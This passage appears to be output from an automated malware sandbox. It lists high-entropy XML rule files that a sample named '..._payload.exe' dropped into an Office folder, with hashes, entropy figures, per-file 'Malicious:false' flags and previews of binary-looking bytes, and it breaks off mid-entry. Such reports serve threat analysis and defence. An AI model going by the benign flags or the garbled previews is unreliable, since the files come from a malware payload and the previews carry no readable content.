                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702701v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.891274533154847
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:0SFI5LmhUAqOoaC80rqijVktInOGIEns9qOD:0SFIpmhRqSCv5jKtCOEs9f
                                                                                                                          MD5:B7CE4BF93DE8784E81854610FDDE1CA7
                                                                                                                          SHA1:499EA04E6F777BE0F3A5622DA6B78564D686D00F
                                                                                                                          SHA-256:FF5FBDF33F79B0B3A74306AD0869B8A372F8C5D1DD97CDE6E2D47D15C720660A
                                                                                                                          SHA-512:32A7095E77A797B58C398ACD4F636DFCF0D7D4F6339DFA937359218DB2A0EC4A61E4990F3CED34C884DF2C9C6726597004029E3B9865F83E78444FFE4A96D24B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml(...5.u.c.._.........n...+...wy.g.....X}`...s.xD.-..-g...1...Q.....D..k{.o6-=-.^..(5SGE.b.C....\5.".C.yKJ."Nh.v.L.}......E:.2...V.....c.D....Fe>.P<.=F.+F....msc.yZK?.p^.m.4..Ne.I:...EUOL......&-<....d..M.s....~.wH..<~.p....<...ug".2:^..Z.,...,.{K....L.k.......\.t.._./.....dN.x9...M......XX]`.Un......Z..d.g3BA..Q.pf......#pi=.fv..?..-...9dD{....A..(..bR...&..R.....D...1..Y[..T...#.t.m.......K.n..sj|..8.......j.b..z.6.w..../Hu._.5....Tw.L.E)..>.IM.s....$..^9g..7N2_..$p.f5U5....1..,.O..)....h^.\....aU..0.\.W.u..j..$c.I.y."..G..Y..DY.g.*....... '..yy.....;o.*...9vP...<...y..d.R...v...9.dDC.....<`m.!..fA...>.0.....(....o..=....^%..^B.z..y..)...2d.F%.v.+.3.....y.H..............{);...c....LN..}.HZ.#.K.*......E.8...Z.J.S.......9..VQ.nh..`f.pU2.([.........S%.PM.\.\HpBO^.....5......~D.....,I....a.9..%g.g..$.t1m.q.0..[......4}...e?T..A....]E.a.6<jh..UB...d\.%..|4 "..E.k..o.O1.\j.,').5].*9y.....Z..8.....y..r....+...8r..N..J.Q.<...[+..D.R.....Lcl.....u

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702750v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1699
                                                                                                                          Entropy (8bit):7.8769703548632455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:k63BLOSx7sLTsn7OSsgpZ7wL+SdmEdeSD:k6wA7qG7OSsgpqLr0Mh
                                                                                                                          MD5:DFE63704113BC5BBAEDA5D714903C981
                                                                                                                          SHA1:D5B97384148F32263FA6254D27BF797575E3FB91
                                                                                                                          SHA-256:27D5307D4AD8EB15AE36AC361DE47A621CA961B099025305C78F47EC6581D26B
                                                                                                                          SHA-512:22D2C24543F901186D9CF0737C3819E701C16C7A03B6045711B8AF0757878FFC109C3F5B82C27B71F00568D8CADB7D13260A8AFDC8585CC1E1FA4C59621587A1
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml6ng.........@2...a.ivM...M..N..........;....2'e.D....,..S....,......B}2.....v.U5..H#E..J.._..(.2..p}.0....Y|.......5K..8....].nGV.F.I..n......fj..jD#..q!..l...........c{hO..{H...*...t.c.H..g.f-2`FQ./.._.{...@......H....|.ZP..b.._...DNflr.c..I....6.T.0A.....yeZ..x#?..m.2..)..B;Y:.a&.(!.R...G..W.f..&.........j3-^{a..P.jpI..L(.L(-M|"..wO.'..c.-......X..<.h.u.....f..-.N..|.E....8....y.......zrv3...C6SYU..OH.~..A.l.yo.Y..x.q.L..Ns..XA....U.{.N.A...m.l]t....*...>.@..Z..g......?.zL.0Q.x].m..!..5.QQO..0.n..d....F..!e.C...cn..&fo...z...}.h.%i......9L....M...2r.s..H"... za*.....f.,...f..`x...z*..8.%.~.9....v.Yk.C.]..\..vl.t..P...n.J.V@..[.i.....}hy.&....-.931r.)..S4....kv.!l.G..2..sX...S....OSX......#+..'..h 1. B.S..>.)6..Li}...F..naQ.R.....8.-.=..{.k..........:.......M...!....7[.=....&....8.....}`>,aX...{.%.I.F..g..)K`iI....48....2..x.j.....^o.)8..E.{...MX-tg..`s.&%....)'U.g....k....2.6k.W.U..XRV...... ..Vv....(K].g@.Q4%A.B.....|..*k._

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702751v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1736
                                                                                                                          Entropy (8bit):7.873945936022927
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:lha11l6J5MEwJpmMO78OU1Jn7N3wukQXSLO/XQVc6sD:lhU1l6J5ME0lOo9L7N32QqP8
                                                                                                                          MD5:3A81F6AE176FCB04D94E45720E2F868E
                                                                                                                          SHA1:C66AD1DB5CA50B42579F38FBDF8C62853F4DD85C
                                                                                                                          SHA-256:C4BCD252866CBE0A09291A19CA073C8D1349D18B2A59E16806ED0DC0B2A7A279
                                                                                                                          SHA-512:67A20C6E3A4A4B2D1F51DA68D9232B045024E1BC0E89E99A1329ACA9C93A3432B3EF35FF99FFE85D8A01F1463D7289EE0559B71C93F740821F30E722F8D4201B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml[....;.J"...Xu(....4(...d...j..~....Zm.Cbi...P...7..S.bT.yH..u....K..x.ee...c.5.....g.|...7....|:Y..:)....Gd.m.;O.\v....]}..g.c..E#...I...M...t.OCv.j."..Q$.X......J.......{6.........`.&%.-.=.k7.yam.5s.......=.hr..6......m2....<..d....|b.................. A..>lJ.+.TR.K....4..0....?....K......#..}f..P.....9.i.0..^.j.^.E..=4......jt4rSI.O..uB.~v....A...$.9.-.&.B.zm`H...*+.~..G;\.Aq.|.g.7.U..."1..6B.....w.LK.Xc..j.Ls29...%.."F.q......5.j....&=.....k1......*.V<.,Z.1..%)..u....N....._].......#?3.<..o&.........yn.f.-O.*....!...&<SP.&.......D.....0G..w..v...WI.h..zjV...q.R.M..I.......8$..,...k....?&.A.*u.i....,....j...T.*...U.....m@..P.c;..........L$9...*Uv......iz..VH...> ..c.....|I'}?.f.(9.n.3...3.w...I..e.'...^.Y.wY.....>..8k.. _].O l..T*....BR.m..'....i...L...a....%Egj/......4ZT.`_..!...%+]..w...B.o!0.n..+. h..-A...,K8...8..."..j..6....M.t.f.+..8.d.iIL..2...jq#T_l...V....U..Xu-i.J....?.I.K..S..{.B.3Rol..U#..H..qq\..8UP..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702800v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1687
                                                                                                                          Entropy (8bit):7.861107980731922
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:npUN5bEoOJE8HKjIAQQRyUQe/JBo+0sf0z9ItugdD:npuxKH2ZRrF/JBWdql
                                                                                                                          MD5:94A474C6A3FEE6C71A0846C0AD4AE607
                                                                                                                          SHA1:8C4FC0D3B941D9A6FE3B55D1FB5069EA40D2F6C8
                                                                                                                          SHA-256:1CBAB45E3217D56BD0D575B3C28FCDE2BAC2598CEF78A70EFD667600582A7318
                                                                                                                          SHA-512:B49AC354634D1715C9F767239D1C63075CB67DE3FBD592F31C121B56109416FD7BF71CB40D0F743DFEF3B79B86D367F6AF2A3545CE97707FAD95CAE56BD061F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmllt.[2..~{....'..wT{.Iy...m.o.V...3N.....~...a.:.........=x;+......o}.Yt.v..u.M.A.K..FRA..K.d=v.......$~.._.......z).OW...k....J...._..CR..).gb.]_.+.`vr;.ch..J.z.5..d.n5...........@y..O..+xv..:..3^[..e.n...Z.f...$..l..SD.'e.....HB...J...Co..T..T......;....o...3.!.V{..]/.^Hkk....qJ.|...O5..+...{0....#......H.e&.{..Y.t..~.n.WB....m:.....67%.X.n..5..3..6._T..L.'...TB8?..o`......!.^i..X9..i.......P.9.....k~M..I.....$.SI#mM..o],\.. ....V}r5K.....&.~..ui......X.A.d..?Q.Dy....y..<..K4.z}.@..V..........N...t .y..m|.....#i.d.......h...:..{.n.>bh.$1.j[...k...G...X.7.3..tH..H.A.{.u....`...;Z&]....b|.......3....=......!..G._.e.O.m.....f.aE.q......F....r...)..@.S?.".....w....D...D.E....m...$......"+.1(;`!..X...h....K}..m..f.......J..#.$Q.W;..]I...".W.&....{. .......kHHA.....].x..K.wZ.(K...F...kW...@.sS!...y`.5Zb..S...<..D>"..G..%.J.q.jD..1_l..~...wp....r...T'..J.....X..r.[.r....ZB...3.x...`F}..Tg.`.9..0..W..3..'.J.g;A$.G]....i....x|J..}..a.5.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702801v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724
                                                                                                                          Entropy (8bit):7.884650571346501
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:bkmcGL0hWDg9/LIUCAfga1eFBkbNIFjhwk+dc6cYZiirt1PBNItNCYYPuo/9Ai7s:bIGLlDULp/fMFeiqHAirzZOZYt/nH7QD
                                                                                                                          MD5:3B4C39988543BAE184E09A911115E640
                                                                                                                          SHA1:D5C1FA5BAE6A5950D16CAB4F633A1AE23857E629
                                                                                                                          SHA-256:E5209E33D1C7CC7EE4FECB980448A7C5C945A338805A1F8E2BCB52D99CC03599
                                                                                                                          SHA-512:B643A37BAD10D1B074B06F822121C75A52129880A547F9C2319C4052A1F6E723E5CC1E1ED0B41952B7EF88DD55F95BFA5F0E87035CFF60B61484E1EE50D9763A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml?..-..h...'-G.e.uP.x.......J6+d[.'....dR."%.....7..C.I...nZ..7...Km...y......q).4..t9...L.@4O..?......o..a.4$....- ..2.X6....0.1.)X.O5&6..aOPcq2...m[&..&.....iz.N.X..r9)..d..?.`j07.u.....P.....h.?4Zf...X#.u.m\.P..^.J....v....Axv^|X.o...DZ.e..^....1t1....p,..........^D..I...57.)...x|.r.pH~.v.F...aDBt..@.zGi..}..l8...\..@...f.I.PT$......7}n..X33|n...O_P..).Xv....c.@w9...Yl..Hl.k...".ZL....g..B.$.O...,F.*.4...\.#u...n..9iO..NI..H.B..7..>.%.l.y.....vS.[zyB...QR.x...}..u.20Pq.......h.y....H{......d....O.k....z...<.....-y......c..].....(.oSsq.]-.h2Q...U.e.my..j\.. ...>b...&O.p.....;f.W..v.K....D...}D..O...&.}.d...V.;..=e]./...".*....z..+On....xe]T`..x....YF0..._(R...E..L1/......{......l....L..oF[e..)..yD.$.W[X%IX.c#.WNLc=..f....M.2.H3W.9.Y.!...,m.....S.E*w..`{..H...l..;5n6...5.....=.F.$..p.fMc...QN.R#9.QV]....o..+&.4....lN.Y...B <....(.R>.(..^...H.. .I..M....I.M`9.|7.).Y.bh/V+.p.........n...%ZU-.C.?.5b..+[A.....N.X...*.G+.qw.e.....n....S.../.De.m.1~.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702850v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1701
                                                                                                                          Entropy (8bit):7.884901161305271
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Rrj/WN+PvJGGgbHRBa2of2RVVJnYNE1UdL9OdVfsiohYoUNGfGsnoJCVn2VXRH0B:1eK8DRbUO1si0XUNGzo0te9AD
                                                                                                                          MD5:F577F7FF4D88D66B2762D0B74543F6B0
                                                                                                                          SHA1:93E0B037583309DAB5FD4772F02718918642FE35
                                                                                                                          SHA-256:8BDCA06A14AA52729B2F9E999BF1578AAC737F93851E6AFF7F7819286ED3A76C
                                                                                                                          SHA-512:30F180E41967C22A84ECC730E5670CE825A60F109BDDBA0F265DB7157BCA82C0C1EE15B7A889A56998CD8C4B50D535FF531C77F73E1C1DF6E8C9D54EB88623C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.k.@S...L..u.X.... .no.`...R&....p...).@|.......;..E..e..=...jY..$.>.t.4Pav....R./..5}@.k..|.T.I...=B... ..zS........z.=.c.?..L.....tO...P..,..&..}.\..%-......<6~.4q..|N:i.xDs..w.K....I.{4.....8@-.%.\....s]e.|..=..Kk....E..J.c.....x..8.........s...R-.oy...i.{Oj=.RT&...;.L3.pY[$+..[...(]~@8........L..6Ph5..r&<R...%A.}.S4.P....f.c...Xg?.+(.&...9....7Q;v....HW...j.|.m....D.l...s)G.\...#"g...g...j...Ls,....`p.I.pn{..08.8..6....HF....Y)-.+...-W..t...G....B.._#.";.w1..q....Q...I..*A..xy. a.4?L%c...RAy`..|.._...o....n^W.....a... .....Iy.a../7..A.Q..5..J~..F.$,.1.`cr..H.dkt.+?.`.P.<.{@.p.aV...I....u...$..]I......L+....m.+cH....L.U%.....MQ.....l...fK..agR......\.(..D....3.....Pc.A......g.,...b.k1...cg..L......"...R...e.mo..F~.!{t6....v.q..T..&.p....w?T...`8!u...y....#.~...-JaE...s.u..%..V..A....."........`......Am1..ezZ....L.3..M kWc....~........Y.3..\..../.?.<..k*.....?.E.T.1..\p..0}w....j..Y.Y^om^..tz.. .X.n..n....;.;..-.Ia....c..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702851v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1738
                                                                                                                          Entropy (8bit):7.877472716064623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:9exG/CSLEWwu9aw2zP+N4JT+hQziXk0aL0nD:YUCSAe8w27VqQzG9aoD
                                                                                                                          MD5:A046D638B2049DFC85177039840B6906
                                                                                                                          SHA1:20B0BAFAE7A681D7422FF32D9CB2B8045BBFA73C
                                                                                                                          SHA-256:28A61D627DDA8D097D781523C89277C1F48D88454C6EFC6CF930833528246392
                                                                                                                          SHA-512:CB49A9B1D1D65A232A239FD17A886FBE70C2E719029D8997E3555031ADA25022DF5DA81698410C51B147032ECCA8DAB2889012D690057B6CBB9CE079199B2EEA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml<eM.k?/.;:. P.K.s#._Q<...*c=pU.pE.I.z.4O.b@..UNDW."...v;B.V....i.C,._x...m..D...l....vY..*w..8....~^..0.%x\v._A..P..HlX..*.}...h.C.&..t....)...)Fx.O.iMz.m.!....RIznSD.....p.j..*.}..5.Uh...z.....G?......-..,..].7.]M.p@...h a..%f.%..;3*[.-...kB.Z.H..9.@/cCc......Q.r..f.Q..6.%^.$}u.6..sI......yT.`..KRKw.2.^.>....:L..]...4.*...(.Q..[......~..]5.....\.i;.V\....58..3k...z.......Oln.l?.@.c...j....+.a.R..-....TM.W....W.H...x..a...M._?-.....=..r.#nG...y....x.<m...y#v.x.q.X.Lu...|.....n>....gJ.........owG,..^..v..}.8$O'...P...;lu..a"i=.-....C.:....?.0Q.V...o.b..j.v.-..V.9....X....i......y..Z..ua..1...X.....i.5M..n+..H`x.].X.JZ./......D.Z.5R..k...x.-..)m.=-.....8...Ii.`.Pb...c......t.....ml..8Y.X.@...f...lG.t...Ns.>Q)r9l0Ij.e.q....B..P..^~..K.CZ.?..K|q}a.D...V..l7.....K./.9-.....Wo.m"2./....[.a...4..o...9.)...y7.....Ar..D..lIu:.....#.Z......).}.?.@q..R.35.b.. ...Z.. ..%.X.c.Xh#....2..,.MK]M.TP...k..b.W\.D"+..Pe./?.6{.D..";..U5..{8X.4.kL:ncW...e.....Zd._Qs

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702900v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1707
                                                                                                                          Entropy (8bit):7.877519825873919
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:UK6PEvKa6mqCbWwwaHsfa4Bp7w/AAfi2+KNtsag7XvPez01iM+7jLntxHAAYRhSN:UvPY6mqC3o4ts9b20YN7jLnjCre5Z5D
                                                                                                                          MD5:CF7912222EC103C9B93241BF97A7742F
                                                                                                                          SHA1:ABD2F468F9943786D2EF7B284F59E85761EDEBB2
                                                                                                                          SHA-256:4D1DC8B1B6CF6B4D3A035F8E2A88549B93A8B89C7E44F1E6C8BB62E8283883A2
                                                                                                                          SHA-512:39580248B331CF8DEBF802AEA7D60244034C9352FB4042331D8D6A40B95888A1A2A5554B335925E8F48E0DE0740E9B9A8E4572119CCF3E150DDEB7933C27DD2B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......e+S..u..{...l8..o..}.<..c0....U..........X..Q.+S....?..&.Q.~.<.........R..s.X..".....l.J.G..@e...p.....d<....*.. ........m......8.<8./.QJ.hR.G..._..A.pIN^...Lm~...}.V.....M.COhw.2IKi.>'.:-...B.....Wc..-..t.C7-....h3...T.FS.....)...-......;.B}..e....]...m...z...Y...DI.....ias.#"............U.3.c....G..J..%.4.Kx...r...`.D0...)w.\}3-....)6.N.......b.$..8.L.I..:.O.....*G..B5.w.X...s.....s..*.zh4..L.Ev.E..qG..8........(.0.KZ}m..7OW}L...[-nO.$.z...^...|.%.a.W.2../.......%.'.j&.<>.~V.@.ol8.}.....K.......#.....h#.....C..d...X..D.99<..j..B....?B.rB.T......Y....QIoj9..@2[...<T.g/..j.oqp]......%..AN...T?@...*.m....U.....y.i..H..m(fc.^6i..q..4.np..%..|.Yr.N]...>..<I.....r|...>%T.b?..JKP.m.?...g.o..x.Rd..`V.*../0j.oF.Sv........_..D.^..U>.t@..........'."..4.n..6..c{.....Bn...Y>,....l..d}B..Ut......P9....T`.Wuz......u.W2iP._K....vq3ym.5D6.....T...e..V..X#L.7.B......7C./...I.V..VR........9...u...&U....._...............k.........:;!...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702901v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1744
                                                                                                                          Entropy (8bit):7.876936127589949
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MowEBzaG5HaJDTpZARmbJU2+mr2b+PCh9I+D:BaG5HWZnq2+mqb+6DIG
                                                                                                                          MD5:07DC012280270BA5AE863449D43A4E4A
                                                                                                                          SHA1:E1BA3C97C4262B8C1156097679926A87832546D4
                                                                                                                          SHA-256:61E35A483BC1A5EF055D1C1F7E028DB913E6E34AAD6F8A8347A9801F84839A1B
                                                                                                                          SHA-512:B3DCC68E2E55ABCBB65BEB196AC60D516905E0086C695E30A37E0642519B356BD5AB0A64FA0C597F00CCFAC48CD7DC118B0D0173F1B64FAE9DA1B37DFCADD272
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml\...g..d.gaQ.......&d....JC&l.9A..9W. .......&.U.]Z.G;j0..T...Qr.i....e~......G...%...] ..dR.D....|#m.1-c.N[o.<y..a-..$.z....{.`..P.<X..T.)6?[d....3..tpL.{.`.:......i.+..PT8#!.....<...pfV.S.5/... $.7g.7|.T.....YJ.....f......m.a.x.,....n1.....Y>...=...[........k...>2..q....]..........=.K<.j..V.fw......TBNdY;....L/MT|..^1...I...4.}.g.BI.....O_..xb.m|..<.._..Y.qM.'bS&s1v.-...a.....D....h.....^.Y.....r..T.......y........./S...e^...>...E..m..u.u.q...q.N.....h...xS..[...$.Y.:....1.....#..w.nWaRk.a.....F)..K......va.....mO..1N"...s.q..0....<.-....Q.Ll.(o.j...=..(Ik)....S..~.!..2....`.C.f....G.b...U.!......>..D.&....K.;U.kI ...$..`.+Y....gc...x.a.... ....<*.x.....b.O...=..M.!z.5.E,..gl.v.x.M.],-X.....9..mirW...E.J.....e...5..j2b......1q..A..8.1......."7.Y,.e.4.....8DI....M.k....b ...D.R.Q...s#.......6.d_fVv..&.F..w..s...`'.........w3.!..f.5.p...... ..c.....)....-~f.........e..Y1....A.3....h8yh..d....l.;....lI`x...".2Z.Q...!.v.S....z.y

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702950v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1701
                                                                                                                          Entropy (8bit):7.875557924198868
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:M90o0Eo9dvg8mQNM+g8uNsZ1G8ffP9ud0CYcLc78F1D:M95oduFs7G8ffIdnxLcoL
                                                                                                                          MD5:54F8F4D9116B8F6B8E5B4349264B7F12
                                                                                                                          SHA1:43E08A46B6839E05B9A4A7E5CEF51C5789C77CB2
                                                                                                                          SHA-256:7037B35F6CBA8E7BB3B257C5832B9CFD49C30BEC5FEA60BDD3BAD6C05195A173
                                                                                                                          SHA-512:E0F5302B63AC36978DFAE09015D24AFD3713F97D3022996C17DEFEDA58026A8B5439CD9A09FBBBE706CF71A7851BAB77E0E8498E6245FCC34600A4752C524B28
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......$V.)..5.......I...$..z9H..'q/..J..?1.s".D..5~.u..h3...AE..;.b..ECEo....rBh"..Rt...../S,..$.......8.|.B.z.`F.........a..:.U]94........]U.N...`.rJ...qr.".;+.7.N..o.`0.9w7..7.....S,T..(.g...c......'.":...J....0j.N(5...n.opk.....C..:.`.............X...^..S.f...<....|\..D9..}..i..e.x.A..T..9..4.....d..S.....r.av..C.&3..I.|...PI.).N..f...m..J.m..R...;....3M..=:....o......|Z.P./..H.......r.F.A...Y.-.i..T.O.>.{...hX..gM......k......U.....l0%|.....uo......I...z..S.....:r........2..N.]...IR...@..<v..cjT7..Fm.8..l.4$|..?|n......a@..#>....*@m".>F...._....P.z.0.{.l......FCs.U.jwJ..S.L5#..5..VC,X..|....o..2"[..,Eo..4#....f....rP.k.L.....S.5..b6....L./...Q...k...SUt._.+......1...)Q..}+@...@#{.?....b....b..s..p...&I4.A....#@..~...r.}'.....C.....G<$.....Z.fLX."HU.T...`b..sD.K...oi...."...s?....&......D]ep-..|3P..Hf....3R].Sc+.T....V.8#..[D...k..>.fO..f..Lnh....R.....J......)C7r.....>.Q."..s.eci.g57c.6.1.......Qq.._".tQ......q4...5r.`.+.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702951v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1738
                                                                                                                          Entropy (8bit):7.8953674912801555
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2V1JRmMnhIC6wNBM6y4mPDLFA+/+pdo+oGV0NALU3D:MJ00L64BMuMDD/+pd1V0mLy
                                                                                                                          MD5:700ECC8FBC831B7198556B0BBDE99368
                                                                                                                          SHA1:88CEBA0BFB1E857A4927768261FE6EB41542D5F6
                                                                                                                          SHA-256:5FABE22A78EF0CF2943663EE3F83AEAC762C0A064D0242C69EE84120C7024263
                                                                                                                          SHA-512:0C275BCF3FC0DE6E740667840CEBD0DAB6F1A777D3CCC2A5B6DB400234DCAED96D339251A15D0FE44BAAB9C91D9CC98D1B77A7C53006471C4624EA6B0F39D35C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml\.y.. .a.l..,9...+.:...4a~..7F.hq.AM.....3...X.-.U?."s._DQ..=>.u..`.S.P...`...r2..q.[.f.........Ye.T~v-V...9g<q.W2.....5.%SN..C..)..B.|.,'.)4U.....3.L_t%.......y.]..7.j...:.=....E(.\M.D!..gY.....T..;R....&A.L.R...X..'.'.YH..Vv.#...Dm.\v..4....z...Tj.........$9f.A.Zo.,.....-C.v.l...U^..B..rHh.2....B..?.y..\..C.4...>.=..#N.b........L.'....h.....w.Zx..+.HJ:y....[.r.8.\.N.....y...V"..Vp.6.+....}y......(... .T-...o.DZbq.?..q..3Af.......M.....F!....].*.|.......5.g.......Y...|....JQY..P17hU.......Uu.H.b@.6.(..l.m...\....(m.$...r...l>..X.^....M........]..)...[.._.U.o..W.2%6...p......p.;+eJ.pF...z..p//.j@x..?.D.N..........1.[.....r.h&.].....S....;..@..X|.......(::.....7.{HHrKA..7._.c.....@.....P0......F2..wJ\.;.8........l..6.`...n.....J.....\B2.rJv..........QBM.9.B...QFK .@..tH*.4i(k...R<........4m:...../r\.G..D...,'..T..P2$c.T..T9R.......3P....J.H.p..e.G....*.DW8..r....).-.s?vo8.ux.R..2.:1ol.56.K.\.1..O..B..9.........c..j...........9.W

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703000v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1702
                                                                                                                          Entropy (8bit):7.8789517568479335
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:967sNg5Q3e11WcM284RDRGbCG8GcJ1qDg135D:IfOeY/4RcbCGvah
                                                                                                                          MD5:A51B3D7A76CB997752811D5D262BE524
                                                                                                                          SHA1:E20B8D6EC3C91FEC281DDA595DE0E7D6F7B34B9C
                                                                                                                          SHA-256:FA66DF4BA79E73C0EBB6518A34691489D5731C1C0F721236E5A44E08CA21F468
                                                                                                                          SHA-512:3C00DDE06142447B5ABDDED69B6EB715BB22082D064DA58B99549CB7EF26592FC0BD335F4895A9E93F35B8D273C4D1251A943ED5E779D9E9DC26F1E429E7357B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...t....$.\[........^L0.vr2.><>7..j.....S.2g.....W.~.-.h.M..h.[..K.A...m?......L7...S.o....D../...].X.z...[.<3.EN...Q.DU..............^...P.....-3*.\8a.nV7/..o.3-..7.....N|i_..G..R.!;.4.2...........s...2f.!.@d<.nDm...I......Z.#.`.!x..W.V._p.-9@\...G..o6?.]..!..E.Q.5..Q~R.>L ....$...<.h.....HZ.L0.k....Q..A...|V{I@.J[N...^b'R...... @|..%.Ai...h.MS>o.g.....x.>oG.cS..!..c.&.c...nb.....U.....Y....|.V+..'..!..^...{D......Qu.?3...i%..lmV.h..k.......Y......$....|...$Y......b.0B!U....ew.......z..F[....^..A?.....).}2...8........4R.G....[.`-H..o..2Z.=..v..|${j.......n.t".DL..K.P.?..=.N7iO+...0.....P.U1p..AIS.._.<.....^X/zh..w....G..0.9..Ij|U..W.?.^:.h.^.E....M4.=g@`..<F.E4.t.%.BNm...(..eCR.........DL.i..zIzH.1=4zX/p......)..-.0...;jRY....c..i.p>+.i....4)[%Hn..Y.F..vj..F9...x[.x....?...A...+.........l.Em.....%.....}U!..9.O....R4.O......@.X(..ha..........{..a...ZZ.z_.Q..........r......Q.?:d..i.&..:h.orp...2../L.V8..[.Dd.D.,&\...` ..5...%.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703001v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1739
                                                                                                                          Entropy (8bit):7.869085718848517
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:PFg+hCV9d+CKSirjaDziYa1QiF6yfI2ClD:BKc4iP32iF6yfI2y
